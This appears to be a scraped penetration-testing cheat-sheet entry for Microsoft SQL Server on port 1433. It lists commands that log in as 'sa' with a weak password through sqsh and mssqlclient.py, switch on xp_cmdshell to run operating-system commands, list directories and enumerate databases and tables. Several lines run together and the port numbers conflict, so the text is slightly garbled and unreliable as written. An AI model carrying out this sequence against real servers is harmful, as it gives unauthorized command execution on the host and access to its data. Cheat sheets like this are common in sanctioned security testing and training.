Port 1433 - MSSQL
sqsh -S $IP -U samssqlclient.py -p 1435 sa:123123@$IPsp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
xp_cmdshell cd C:/Users && dirSELECT name FROM master.dbo.sysdatabaseSELECT * FROM $dbname.INFORMATION_SCHEMA.TABLES;Last updated
